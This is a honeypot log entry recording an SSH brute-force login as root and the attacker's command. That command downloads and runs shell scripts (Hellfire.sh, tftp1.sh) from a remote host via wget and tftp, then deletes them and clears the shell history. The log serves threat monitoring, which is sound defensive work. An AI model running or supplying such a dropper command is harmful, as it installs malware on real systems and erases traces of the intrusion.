Time | 2024/02/04, 09:13:51 (GMT) |
Transaction ID | CFZR6DBUY91IFALB |
Service | ssh |
Location | BG (Bulgaria) |
Attacker | 91.92.243.138 |
Classification | Web script execution |
Harm Potential | High |
91.92.243.138 client username 'root' and password 'root' entered 91.92.243.138 client command : 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://91.92.244.11/Hellfire.sh; chmod 777 *; sh Hellfire.sh; tftp -g 91.92.244.11 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c'
All observations are coming from honeypot central database.
Please share your wishes, opinions and suggestions with us: Honeypots.tk Admin |
If you like, you can support |